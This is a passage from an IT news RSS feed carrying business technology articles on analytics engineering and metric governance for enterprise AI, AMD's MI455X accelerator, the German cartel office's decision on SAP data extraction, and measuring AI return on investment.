<p class="wp-block-paragraph">The role is growing but poorly understood at the top:<a href="https://www.getdbt.com/resources/state-of-analytics-engineering-2024#download"> dbt Labs’ 2024 s</a>urvey found only 14% of data professionals strongly agree their organization sets clear goals for their data team which is a number that holds steady across individual contributors and managers alike. The core function includes being able to speak both the language of core data engineering and product analytics while having a solid understanding of the business events to track for downstream end-user reporting.</p>



<p class="wp-block-paragraph">The analytics engineer plays a vital role in designing as well as reviewing data models to be used for reporting in conjunction with data engineers who are building these, often in SQL and Spark. This is not reporting work — it is infrastructure work and therefore analytics in production environments must be engineered as infrastructure, not assembled as reporting.</p>



<p class="wp-block-paragraph">From these defined business events and key objectives for tracking the health of the product, the analytics engineers need to be able to derive key metrics and dimensional slicing, validating the logic while ensuring those definitions are consistent across all central teams and geographies, and embedding the validation checks that make outputs trustworthy. The practitioner in this role can answer the question no one else can: “Why is the AI giving a different number than the dashboard, and who owns fixing it?”</p>



<h2 class="wp-block-heading"><a></a>Why AI exposed the gap</h2>



<p class="wp-block-paragraph">The metric governance problem has existed even before AI, with different teams using different definitions, regional inconsistencies, manual reconciliation cycles — but it was still controllable when humans were entirely responsible for all final reconciliation and data interpretation, and often any data inconsistencies were caught at the analysis stage. Now, with AI in the picture, it removes the human interpreter stage altogether. When an AI system consumes an ungoverned metric, it inherits the ambiguity at the data layer and amplifies it at the output layer. Executives receive different answers to the same question depending on which system they ask.</p>



<p class="wp-block-paragraph">Confidence in AI erodes independently of model quality — and the numbers bear this out: <a href="https://resources.foundryco.com/en-us/download/state-of-the-cio-summary?utm_source=google&amp;utm_medium=ppc&amp;utm_campaign=2026-state-of-the-cio&amp;utm_feeditemid=&amp;utm_device=c&amp;utm_term=chief%20information%20officer&amp;utm_source=google&amp;utm_medium=ppc&amp;utm_campaign=2023%20State%20of%20the%20CIO&amp;utm_content=i2cp_rsch_sotc_wp&amp;hsa_cam=20572857787&amp;hsa_grp=156721913427&amp;hsa_mt=b&amp;hsa_src=g&amp;hsa_ad=674554293037&amp;hsa_acc=6730293691&amp;hsa_net=adwords&amp;hsa_kw=chief%20information%20officer&amp;hsa_tgt=aud-2237356011588:kwd-10610491&amp;hsa_ver=3&amp;gad_source=1&amp;gad_campaignid=20572857787&amp;gbraid=0AAAAABNiRv1KPIWlOSCUvKiIJyUdNH5k2&amp;gclid=Cj0KCQjw39zSBhDhARIsANammDvDzsCXmDaWYVA11T-_vj0a4gMm3Rm-YG563ROZkP8tHOE79nD3PzAaAmhbEALw_wcB">Foundry’s 2026 State of the CIO</a> study found that fewer than half of  enterprise IT leaders have established formal AI success metrics, and only 19% say AI initiatives have met or exceeded ROI goals. <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai">McKinsey’s 2025 State of AI </a>survey found that nearly two-thirds of organizations have not yet begun scaling AI across the enterprise — and explicitly named the absence of platforms and guardrails, not model capability, as the reason.</p>



<p class="wp-block-paragraph">Popular semantic layer tools like dbt Metrics and LookML describe how metrics should be calculated but do not enforce correctness, which means there is no structural guarantee that the calculation is consistent across regions and can be traced to an authoritative source that is version-controlled on git or maintained by anyone accountable for its accuracy. With conversation and agentic AI systems embedded into the analytics workflow, the data inconsistency problem is further amplified where agents make sequential decisions, each one building on the previous output. A metric that drifts in a traditional pipeline generally produces one wrong number. The same drift in an agentic workflow can produce a chain of downstream decisions built on that wrong number, with no architectural checkpoint to catch it. This is not a model problem. It is a governance architecture problem — and it requires a specific type of data practitioner to detect and solve it.</p>



<h2 class="wp-block-heading"><a></a>Ownership and enforcement</h2>



<p class="wp-block-paragraph">The analytics engineer owns the semantic data layer: The governed, versioned, validated definitions of every metric that matters to the business. This includes standardizing metric definitions across teams and geographies, embedding validation logic directly into data pipelines, assigning ownership accountability for each metric, and ensuring AI systems consume only validated outputs. The technical signature of this role dives into the reconciliation controls that proactively detect and stall the data pipeline on failure rather than alerting after incomplete or incorrect data lands; This also includes financial reconciliation from upstream to downstream for all the data models trying all data values to financial statements and accounting ledgers, as well as jurisdiction-aware validation logic that treats regional regulatory differences as first-class properties supported by version-controlled metric definitions that create an audit trail.</p>



<p class="wp-block-paragraph">While data engineers are responsible for moving and transforming data from online to offline data warehouses, analytics engineers govern what that data means and ensure the meaning is consistent everywhere it is consumed. Data scientists, on the other hand, build machine learning models to detect anomalies, fraud or product marketing opportunities, while analytics engineers build the trusted data foundation those models depend on, making sure whether that data is accessed via manual querying, imported via dashboard tableau extracts or consumed via large language model (LLM), the end user receives consistent answers based on trusted and governed metrics. Data analysts are responsible for surfacing these metrics and building actionable dashboards and reports for leadership, while analytics engineers make sure that the data surfaced is of the utmost quality. Therefore, in the absence of this role,  oftentimes the data engineer, the data scientist and the data analyst are working around a gap that none of them owns.  </p>



<h2 class="wp-block-heading"><a></a>What happens when the role is absent</h2>



<p class="wp-block-paragraph">In the absence of this dedicated analytics engineer role, enterprises most often encounter the issue of the “which number is right” question where finance has one revenue figure, product intelligence has another and the LLM model has a third value, and none of these seem to reconcile.</p>



<p class="wp-block-paragraph">One of the common issues seen in AI projects that work in pilot and often break in production is that the pilot references clean, curated datasets and production data containing millions or even billions of records still reference the ungoverned data layer. The third and significant issue seen across enterprises is the analytics team burnout, where data engineers, scientists and analysts spend 60-70% of their time on reconciliation and firefighting rather than new pipeline creation and insight generation, because there is no governed layer to prevent these fires. The fourth issue is the hidden cost of delayed decisions, eroded executive trust and AI investments that deliver less than projected because the data foundation was never built. Most organizations recognize that they need this role only after something breaks in front of an executive, by which time the damage is already done.</p>



<h2 class="wp-block-heading"><a></a>How to identify and hire talent for this role</h2>



<p class="wp-block-paragraph">Analytics engineer, data governance engineer and metrics engineer are all applicable titles for this role. But what really matters technically is the experience with data modeling, semantic layer tooling (dbt, LookML, etc.), validation pipeline design, reconciliation architecture, data lineage and data governance. An ideal candidate is someone who thinks about data correctness as a structural constraint, not a quality preference,  where the first instinct is to stop the pipeline rather than alert and continue with bad data to land and affect stakeholder dashboards.</p>



<p class="wp-block-paragraph">While interviewing, it’s critical to ask candidates to describe a time they caught a metric inconsistency before it reached a stakeholder. The answer will reveal whether they think in governance terms or reporting terms. This role belongs in the data platform engineering or analytics infrastructure team, not in BI or reporting — it is mostly infrastructure work, not data visualization work. If the role doesn’t exist in your org chart, it exists somehow informally, usually as the senior data engineer whom everyone asks when the numbers don’t reconcile.</p>



<h2 class="wp-block-heading"><a></a>Key takeaways</h2>



<p class="wp-block-paragraph">The enterprises that are scaling faster and winning with AI in 2026 are not the ones with the best models, best-in-class AI infrastructure or large budgets. They are the ones who invested the time and effort in successfully building the governed data foundation before deploying the LLMs, and they built it because someone in the organization understood that metric governance is the fundamental data foundation that defines the nervous system of data and insights. It is an architectural property, not a configuration setting in the model, and the data practitioner who helps embed this thinking as a design strategy is the analytics engineer.</p>



<p class="wp-block-paragraph">The role is the need of the hour, the discipline is established, and the gap it fills is not going away as AI systems become more autonomous. The question for every CIO is not whether this role is needed, as the AI deployment failures already answer that. The question is whether you should hire for it before the next deployment hiccup.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD unveils AI GPU to challenge Nvidia’s Rubin]]></title>
<description><![CDATA[AMD has answered Nvidia’s Rubin GPUv challenge with the introduction of the Instinct MI455X accelerator, its flagship processor designed for large-scale AI training and inference with absolute whopping specs.



The MI455X, unveiled during AMD’s recent Advancing AI 2026 event, is the new flagship...]]></description>
<link>https://tsecurity.de/de/3701235/it-security-nachrichten/amd-unveils-ai-gpu-to-challenge-nvidias-rubin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701235/it-security-nachrichten/amd-unveils-ai-gpu-to-challenge-nvidias-rubin/</guid>
<pubDate>Mon, 03 Aug 2026 20:16:17 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4021291/amd-latest-news-and-insights.html">AMD</a> has answered Nvidia’s <a href="https://www.networkworld.com/article/4188058/nvidia-unveils-vera-rubin-platform-targeting-ai-hpc-infrastructure-customers.html">Rubin GPU</a>v challenge with the introduction of the Instinct MI455X accelerator, its flagship processor designed for large-scale AI training and inference with absolute whopping specs.</p>



<p class="wp-block-paragraph">The MI455X, unveiled during <a href="https://www.networkworld.com/article/4089519/amd-outlines-ambitious-plan-for-ai-driven-data-centers.html">AMD’s</a> recent Advancing AI 2026 event, is the new flagship of the company’s Instinct MI400 family and will power its <a href="https://www.networkworld.com/article/4199402/helios-marks-amds-biggest-ai-infrastructure-push-yet.html">Helios rack-scale AI platform</a>. The launch shows that even though it is lagging in terms of market share, AMD is at least able to match Nvidia when it comes to  technology.</p>



<p class="wp-block-paragraph">Spec-wise, the MI455X almost matches and in some cases surpasses the Rubin architecture. The Instinct MI455X boasts 320 billion transistors, 432GB of HBM4 memory, and up to 40 petaflops of FP4 AI compute.</p>



<p class="wp-block-paragraph">The memory is significant (and an example of why there is such a <a href="https://www.networkworld.com/article/4119222/whats-causing-the-memory-shortage.html">memory shortage</a> currently). Rubin is expected to deliver approximately 50 PFLOPS of FP4 performance but has 288GB of HBM4 memory, 50% less than Instinct. AMD also claims memory bandwidth of up to 23.3 TB/s, slightly exceeding Rubin’s 22 TB/s.</p>



<p class="wp-block-paragraph">The MI455X is built on AMD’s new CDNA 5 architecture, representing the company’s most significant accelerator redesign in years. Manufactured using a combination of TSMC’s 2nm and 3nm process technologies, the chip incorporates 320 billion transistors through an advanced chiplet design connected with 3D hybrid bonding.</p>



<p class="wp-block-paragraph">The architecture introduces improvements in tensor processing, cache bandwidth, memory movement, and execution efficiency aimed at accelerating large language models and agentic AI workloads.</p>



<p class="wp-block-paragraph">With up to 40 PFLOPS of FP4 performance and 20 PFLOPS of FP8 compute, the Instinct 455X roughly doubles the AI compute capability of the current Instinct MI350 generation. It also massively increases HBM memory bandwidth from roughly 8 TB/s on MI350 to more than 23 TB/s on the new accelerator.</p>



<p class="wp-block-paragraph">Both NVIDIA and AMD have stopped positioning their GPUs as standalone products. Rather, they are positioned as a component in an overall compute system that includes CPU, networking, security, and software.</p>



<p class="wp-block-paragraph">The Helios rack-scale platform — AMD’s answer to Nvidia’s DGX platform — links 72 GPUs into a unified system. A fully configured Helios rack features Instinct accelerators, EPYC processors, Pensando networking, and the ROCm software stack. AMD says it provides up to 31TB of HBM4 memory and as much as 2.9 exaflops of FP4 AI compute.</p>



<p class="wp-block-paragraph">So for now, AMD has a viable competitor to <a href="https://www.networkworld.com/article/4140107/amd-accelerates-telecom-network-ai.html">Nvidia</a> at the high end. Whether this moves the needle and helps AMD gain ground remains to be seen. But on paper, the MI455X narrows the hardware gap considerably, offering competitive AI compute alongside substantially more memory than Nvidia’s Rubin architecture, which is a combination designed to appeal to customers training ever-larger AI models.</p>



<p class="wp-block-paragraph">The Instinct MI455X will begin shipping at the end of the third quarter of 2026, with volume ramping through the fourth quarter and into the first half of 2027.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP dodges German antitrust investigation over data extraction]]></title>
<description><![CDATA[SAP is not unfairly preventing enterprises from extracting their data from its systems for use with competitors’ applications, the German Federal Cartel Office (Bundeskartellamt) concluded Thursday after a preliminary investigation.



The Bundeskartellamt does not currently intend to initiate ab...]]></description>
<link>https://tsecurity.de/de/3701143/it-nachrichten/sap-dodges-german-antitrust-investigation-over-data-extraction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701143/it-nachrichten/sap-dodges-german-antitrust-investigation-over-data-extraction/</guid>
<pubDate>Mon, 03 Aug 2026 20:15:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">SAP is not unfairly preventing enterprises from extracting their data from its systems for use with competitors’ applications, the German Federal Cartel Office (Bundeskartellamt) concluded Thursday after a preliminary investigation.</p>



<p class="wp-block-paragraph">The Bundeskartellamt does not currently intend to initiate abuse proceedings against SAP, although it will continue to monitor developments in what it views as a dynamic market, it said in a news release.</p>



<p class="wp-block-paragraph">It launched its investigation into SAP’s practices following complaints by software companies including Celonis, a developer of process mining tools, alleging that SAP makes it difficult for customers and third parties to access data from its ERP systems and favors its own Signavio process mining tool.</p>



<p class="wp-block-paragraph">“Companies must generally also be able to use their own data in third-party applications. With large software platforms, in particular, non-discriminatory access to data is crucial to effective competition,” <a href="https://www.bundeskartellamt.de/SharedDocs/Meldung/EN/Pressemitteilungen/2026/07_30_2026_SAP_Celonis.html" target="_blank" rel="noreferrer noopener">said Bundeskartellamt President Andreas Mundt</a>. “Our preliminary investigation has found that there are currently sufficient data extraction options available and that there have so far been no indications of exclusionary practices that may be relevant under competition law.”</p>



<p class="wp-block-paragraph">SAP changed its policies on accessing data held in its applications via APIs in April, <a href="https://www.cio.com/article/4166172/dsag-criticizes-saps-new-api-policy.html">prompting customer pushback</a>.</p>



<p class="wp-block-paragraph">But, said Mundt, the Bundeskartellamt found that despite the API policy change, data extraction options that were previously permissible are still available.</p>



<h2 class="wp-block-heading">Data extraction is possible</h2>



<p class="wp-block-paragraph">SAP welcomed the Bundeskartellamt decision, saying that “as the authority states, SAP customers and partners have sufficient and permissible technical options to extract data from SAP systems and use it in solutions from other providers. The SAP API Policy does not restrict these capabilities.”</p>



<p class="wp-block-paragraph">Celonis also issued a statement, noting that the Bundeskartellamt ruling underlined the continued importance of unrestricted data access, and warning, “The decision is based on the key premise that data extraction for software from providers such as Celonis will remain possible even under SAP’s new API policy — a premise that SAP has been unwilling to confirm to date.”</p>



<p class="wp-block-paragraph">The Celonis statement continued, “We remain steadfast in our conviction that company data belongs entirely to the customers who generate it. No provider should restrict a company’s right to extract its own information or prevent users from working with third-party providers such as Celonis that offer added value to customers.”</p>



<p class="wp-block-paragraph">Celonis is also attacking SAP’s policies on data extraction in court in California. It <a href="https://www.cio.com/article/3847242/celonis-declares-sap.html">filed a complaint in March 2025</a> alleging that SAP was leveraging its software to “prevent SAP customers from sharing their own data with third-party providers, including Celonis, without paying prohibitively expensive fees.” The <a href="https://www.cio.com/article/4016013/us-judge-issues-split-decision-in-antitrust-case-against-sap.html">judge dismissed some of the claims in that case</a>, leaving three to be tested in a trial then scheduled for December 2026. Celonis has since amended its complaint to include 10 claims, and the trial has been rescheduled for 2027, the company said.</p>



<p class="wp-block-paragraph">“Our litigation continues to uncover evidence of SAP’s unlawful behavior, including anticompetitive conduct and theft of intellectual property, and we are confident in the evidence that we will present at trial,” Celonis said following the German authority’s decision.</p>



<p class="wp-block-paragraph">The Bundeskartellamt’s failure to find sufficient evidence to open a ‘formal abuse of dominance proceeding’ is a small win for SAP, said <a href="https://www.infotech.com/profiles/scott-bickley" target="_blank" rel="noreferrer noopener">Scott Bickley</a>, advisory fellow at Info-Tech Research, but “CIOs should not mistake it for a validation of SAP’s data access model.”</p>



<p class="wp-block-paragraph">Although SAP recognizes customers’ right to decide they use their data, it does not make it easy for them to do so, he said. “CIOs may technically retain vendor choice but be faced with expensive replication architectures, API rate and volume restrictions, additional platform costs, performance lags and data migration costs, all with a dependency on an SAP-approved technical pattern, which can be a moving target.”</p>



<h2 class="wp-block-heading">Data ownership as a procurement issue</h2>



<p class="wp-block-paragraph"><a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, sees the decision as an instructive one for enterprise CIOs.</p>



<p class="wp-block-paragraph">“This isn’t a reason to stop asking hard questions of your ERP vendor. Whether it’s SAP, Oracle, Microsoft, Salesforce, or anyone else, enterprises should continue to evaluate how easy it is to access their own operational data, integrate third-party applications, and migrate workloads if business priorities change. Those questions are becoming strategic procurement issues, not just technical ones,” Greis said.</p>



<p class="wp-block-paragraph">CIOs should consider data portability early in the procurement process, said <a href="https://www.linkedin.com/in/kaandincer" target="_blank" rel="noreferrer noopener">Kaan Dincer</a>, CEO of data migration vendor Settle: “Negotiate export rights, API access on reasonable terms, and documentation of the data model before signing and test a real extraction while the vendor still wants your renewal. The cost of your eventual exit is set on the day you implement, not the day you leave. ERP data now feeds analytics and automation outside the system of record, so access friction that used to be an IT annoyance is becoming a strategy constraint.”</p>



<p class="wp-block-paragraph">In the SAP case, he said, “the regulator answered a narrow legal question, not the operational one. Declining to open proceedings means the friction was not shown to be anticompetitive. It does not mean the friction is not real. The Bundeskartellamt’s own findings acknowledge that extracting large data volumes is technically demanding and it said explicitly that it will keep watching as access mechanisms and license models evolve. That is not a clean bill of health. It is a decision to hold fire.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/srinivasulureddybattu/" target="_blank" rel="noreferrer noopener">Srinivasulu Reddy Battu</a>, a senior software engineer with cloud vendor ZT Systems, said the big takeaway is the difference between difficult and impossible. SAP’s argument is that the data migration outside of its environment is possible, but Battu said it can be a time-consuming and expensive process.</p>



<p class="wp-block-paragraph">“When the ruling says ‘various permissible and viable options’ exist, that’s technically true, but it glosses over how much expertise it actually takes to use them,” Battu said. “CIOs should still watch how process mining gets packaged in their contracts. If Signavio comes included by default, teams will naturally start using it and that quietly reduces your negotiating power with other vendors over time. This isn’t just about SAP: Oracle, Microsoft, every major ERP vendor sits on a massive amount of your business data. If any of them decided to tighten their API policies tomorrow, most companies would be scrambling.”</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s measurement crisis is over. The translation crisis is next]]></title>
<description><![CDATA[Last fall, you couldn’t open a business publication without tripping over some version of the same headline: where is the ROI for AI? The anchor for most of that coverage was MIT’s “GenAI Divide” report, which found that despite $30 to 40 billion in enterprise generative AI spending, 95% of pilot...]]></description>
<link>https://tsecurity.de/de/3701144/it-nachrichten/ais-measurement-crisis-is-over-the-translation-crisis-is-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701144/it-nachrichten/ais-measurement-crisis-is-over-the-translation-crisis-is-next/</guid>
<pubDate>Mon, 03 Aug 2026 20:15:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"></p>



<p class="wp-block-paragraph">Last fall, you couldn’t open a business publication without tripping over some version of the same headline: where is the ROI for AI? The anchor for most of that coverage was <a href="https://fortune.com/2025/08/18/mit-report-95-percent-generative-ai-pilots-at-companies-failing-cfo/">MIT’s “GenAI Divide” report</a>, which found that despite $30 to 40 billion in enterprise generative AI spending, 95% of pilots delivered no measurable P&amp;L impact. The bubble takes wrote themselves. Boards asked uncomfortable questions. More than a few AI budgets went into the freezer for the winter.</p>



<p class="wp-block-paragraph">Here’s the detail that got lost in the panic: the study defined success as measurable KPI impact within six months of the pilot. Read that again. A project that transformed how a team worked but was never instrumented to prove it counted as a failure. <a href="https://exec-ed.berkeley.edu/2025/09/beyond-roi-are-we-using-the-wrong-metric-in-measuring-ai-success/">Researchers at UC Berkeley pushed back</a> on exactly this point, arguing that the 95% figure may represent 95% of organizations measuring the wrong things at the wrong time rather than 95% of projects failing to create value.</p>



<p class="wp-block-paragraph">In other words, the AI ROI crisis of 2025 was never really about the AI. It was about measurable verification. Most enterprise AI projects didn’t fail. They were simply built in a way that made success unprovable. If you’re a CIO defending a budget line, that distinction is cold comfort, because “we can’t tell if it worked” and “it didn’t work” produce the same conversation with your CFO. But the diagnosis matters, because the treatment is completely different. You don’t fix an unprovable project with a better model. You fix it by picking a better problem.</p>



<p class="wp-block-paragraph">I’ve <a href="https://thenewstack.io/theres-no-sku-for-ai-a-3-box-framework-to-avoid-ai-failures/">argued before</a> that AI initiatives should start with problems that already have good data and trusted metrics, and over the first half of 2026, the market arrived at that conclusion on its own.</p>



<h2 class="wp-block-heading"><a></a>The quiet correction of 2026</h2>



<p class="wp-block-paragraph">Watch where enterprise AI money actually went in the first half of this year and you’ll see a pattern that never made headlines: a hard pivot toward employee-facing use cases. Agents assisting support reps, sales teams, claims processors, IT help desks. The conventional read is that these are the safe choices, the training-wheels projects companies run while they work up the nerve for customer-facing AI.</p>



<p class="wp-block-paragraph">That read is wrong. The pivot to employee-facing AI isn’t about safety. It’s about scoreboards.</p>



<p class="wp-block-paragraph">Think about what an employee-facing workflow comes with that a greenfield AI initiative doesn’t. You already measure it. Average handle time, first-call resolution, cases closed per week, quota attainment. Those KPIs have years of baseline data behind them. More importantly, they’re politically real. In many organizations, people are bonused on those numbers. Nobody in the room disputes the methodology of a metric that’s been sitting on a comp plan for five years. When you drop an agent into that workflow and the KPIs move in the right direction across the entire employee population, ROI stops being a philosophy seminar and becomes back-of-the-envelope arithmetic. Headcount, fully loaded cost, percentage improvement, multiply.</p>



<p class="wp-block-paragraph">The survey data backs up what I’ve been seeing in the field. <a href="https://foundryco.com/research/research-ai-priorities/">Foundry’s 2026 AI Priorities study</a> found that improving employee productivity is now the single biggest business objective driving AI investment, cited by 55% of IT decision-makers. This publication’s own <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">25th annual State of the CIO research</a> tells the same story from the measurement side: lack of clear ROI metrics remains a critical barrier to AI success, cited by 32% of IT leaders, and among organizations that measure AI success at all, operational efficiency and process improvement (40%), employee productivity (34%) and cost reduction (30%) dominate, while revenue impact trails at 27%. And <a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html">Deloitte’s State of AI in the Enterprise</a> found two-thirds of organizations reporting productivity and efficiency gains from AI, while only 20% can point to revenue growth.</p>



<p class="wp-block-paragraph">Notice what those numbers describe. The industry didn’t get better at measuring AI. It got better at picking problems that were already measured.</p>



<h2 class="wp-block-heading"><a></a>The post-mortem question nobody asks first</h2>



<p class="wp-block-paragraph">Which brings us to the diagnostic. When an AI project can’t demonstrate ROI, the instinct is to interrogate the technology. Wrong model. Wrong vendor. Insufficient context. Hallucinations. Sometimes that’s true. But the first question in the post-mortem should be about a decision that was made before a single token was generated: what problem did we pick?</p>



<p class="wp-block-paragraph">Did that problem have good data behind it? And did it have a scoreboard anyone trusted before the AI showed up? If the answer to either question is no, the project was never going to prove anything, no matter how well the technology performed. You can’t demonstrate improvement against a baseline that doesn’t exist, and you can’t win an argument with a metric that was invented the same week as the pilot. The MIT study’s 95% weren’t all technology failures. A meaningful share of them were selection errors, committed months earlier in a planning meeting, by people who chose an exciting problem over a measurable one.</p>



<h2 class="wp-block-heading"><a></a>The bill comes due</h2>



<p class="wp-block-paragraph">Here’s the uncomfortable part. Just as the industry figured out the measurability trick, the goalposts started moving.</p>



<p class="wp-block-paragraph"><a href="https://futurumgroup.com/press-release/enterprise-ai-roi-shifts-as-agentic-priorities-surge/">Futurum’s survey of 830 enterprise IT decision-makers</a> in the first half of 2026 documents the shift: productivity gains fell from 23.8% to 18.0% as the primary ROI metric buyers use to justify AI investment, while hard financial measures, top-line revenue and bottom-line profitability combined, nearly doubled to 21.7%. The productivity argument carried the pilot era. CFOs accepted “the KPIs moved” as an answer for a while. Now, they want hard dollars.</p>



<p class="wp-block-paragraph">This is where the next generation of AI projects will separate winners from the pack, and it requires something almost no one negotiates up front: an ROI exchange rate. That’s the pre-agreed formula, signed off by finance before deployment, that converts KPI movement into currency. One point of first-call resolution improvement equals this many dollars. One hour of engineering time recovered equals that many. It sounds bureaucratic. It’s the opposite. The exchange rate is what lets a project claim its value the moment the KPIs move, instead of spending two quarters in a methodology debate trying to reverse-engineer credit after the fact.</p>



<p class="wp-block-paragraph">Without an exchange rate, even a well-instrumented project tops out at a productivity story. With one, the same project is a P&amp;L story. Same technology, same results, entirely different conversation with the CFO.</p>



<h2 class="wp-block-heading"><a></a>The award was won before deployment</h2>



<p class="wp-block-paragraph">This month CIO celebrates the <a href="https://www.cio.com/">CIO 100 Awards</a>, recognizing technology initiatives that deliver measurable business value. Study those winning projects and you’ll find plenty of impressive technology. But the thing they share isn’t a model or an architecture. It’s that “measurable” was engineered in at problem selection. The winners picked problems with real data and trusted scoreboards, and they agreed with finance on what the score was worth before they started playing.</p>



<p class="wp-block-paragraph">That’s the part of innovation that never makes it on stage, and it’s the part worth copying. So, flip the question that dominated last fall. Don’t ask where the ROI for AI is. Ask whether you picked a problem that could ever answer that question, and whether anyone wrote down the exchange rate.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The missing role in every enterprise AI strategy: The analytics engineer]]></title>
<description><![CDATA[Every enterprise AI strategy these days has mostly the same core cast: Software engineers who log online events data, data engineers who move data from online to offline data warehouses, data scientists who build machine learning models, AI/ML engineers who deploy these models to production syste...]]></description>
<link>https://tsecurity.de/de/3701146/it-nachrichten/the-missing-role-in-every-enterprise-ai-strategy-the-analytics-engineer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3701146/it-nachrichten/the-missing-role-in-every-enterprise-ai-strategy-the-analytics-engineer/</guid>
<pubDate>Mon, 03 Aug 2026 20:15:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Every enterprise AI strategy these days has mostly the same core cast: Software engineers who log online events data, data engineers who move data from online to offline data warehouses, data scientists who build machine learning models, AI/ML engineers who deploy these models to production systems and data analysts who consume these data outputs and help create dashboards and self-serve agents for product and business leadership for informed decision making. Despite this systematic setup, the same mode of failure still keeps recurring across industries: AI outputs contradict the dashboard, executives eventually stop trusting the numbers and there seems to be no clear owner of the gap between them.</p>



<p class="wp-block-paragraph">The missing role is not a brand-new role. It is a discipline that has existed for less than a decade, is still not clearly understood at the leadership level, and has no standardized hiring rubric at most organizations. It is the analytics engineer, and the absence of this role is why most enterprise AI deployments seem to stall before they scale.</p>



<h2 class="wp-block-heading"><a></a>What is analytics engineering ?</h2>



<p class="wp-block-paragraph">Analytics engineering sits right at the intersection between data engineering, data science and business intelligence — it is the discipline responsible for transforming raw data into a trusted, governed, reusable semantic layer with metrics and dimensions that both humans and AI systems can rely on. The role emerged from the dbt ecosystem as well as early data infrastructure work at Netflix around 2016-2018, but remains unclearly defined at the leadership level — most CIOs either conflate it with data engineering or product data science or business intelligence analysts, or don’t have a job family for it at all.</p>



<p class="wp-block-paragraph">The role is growing but poorly understood at the top:<a href="https://www.getdbt.com/resources/state-of-analytics-engineering-2024#download"> dbt Labs’ 2024 s</a>urvey found only 14% of data professionals strongly agree their organization sets clear goals for their data team which is a number that holds steady across individual contributors and managers alike. The core function includes being able to speak both the language of core data engineering and product analytics while having a solid understanding of the business events to track for downstream end-user reporting.</p>



<p class="wp-block-paragraph">The analytics engineer plays a vital role in designing as well as reviewing data models to be used for reporting in conjunction with data engineers who are building these, often in SQL and Spark. This is not reporting work — it is infrastructure work and therefore analytics in production environments must be engineered as infrastructure, not assembled as reporting.</p>



<p class="wp-block-paragraph">From these defined business events and key objectives for tracking the health of the product, the analytics engineers need to be able to derive key metrics and dimensional slicing, validating the logic while ensuring those definitions are consistent across all central teams and geographies, and embedding the validation checks that make outputs trustworthy. The practitioner in this role can answer the question no one else can: “Why is the AI giving a different number than the dashboard, and who owns fixing it?”</p>



<h2 class="wp-block-heading"><a></a>Why AI exposed the gap</h2>



<p class="wp-block-paragraph">The metric governance problem has existed even before AI, with different teams using different definitions, regional inconsistencies, manual reconciliation cycles — but it was still controllable when humans were entirely responsible for all final reconciliation and data interpretation, and often any data inconsistencies were caught at the analysis stage. Now, with AI in the picture, it removes the human interpreter stage altogether. When an AI system consumes an ungoverned metric, it inherits the ambiguity at the data layer and amplifies it at the output layer. Executives receive different answers to the same question depending on which system they ask.</p>



